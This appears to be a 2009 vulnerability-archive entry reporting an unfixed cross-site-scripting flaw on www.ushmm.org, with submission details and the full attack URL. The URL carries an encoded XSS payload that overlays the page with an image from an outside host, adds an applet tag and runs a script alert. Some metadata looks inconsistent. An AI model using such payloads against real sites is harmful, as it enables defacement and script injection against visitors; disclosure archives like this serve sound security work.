Security researcher kvk, has submitted on 03/05/2009 a cross-site-scripting (XSS) vulnerability affecting www.ushmm.org, which at the time of submission ranked 31994 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 01/07/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 03/05/2009 |
Date published: 01/07/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: kvk |
Domain: www.ushmm.org |
Category: XSS |
Pagerank: 31994 |
URL: http://www.ushmm.org/wlc/search_result.php?lang=en&searchFor=idcard&Find=%3Cinput%20style%3D%22backg round%3A%23000%20url(http%3A//hzh4xx.700megs.com/xss.png)%20center%20no-repeat%3Bheight%3A100%25%3Bw idth%3A100%25%3Bposition%3Aabsolute%3Bleft%3A0px%3Btop%3A0px%3B%22%3E%20%3Capplet%20codebase%3D%22cl asses%22%20width%3D%270%27%20height%3D%270%27%3E%20%3Cscript%3Ealert(%27KvK%20^_^%27)%3B%3C/script%3 E |
Click here to view the mirror
|
|
|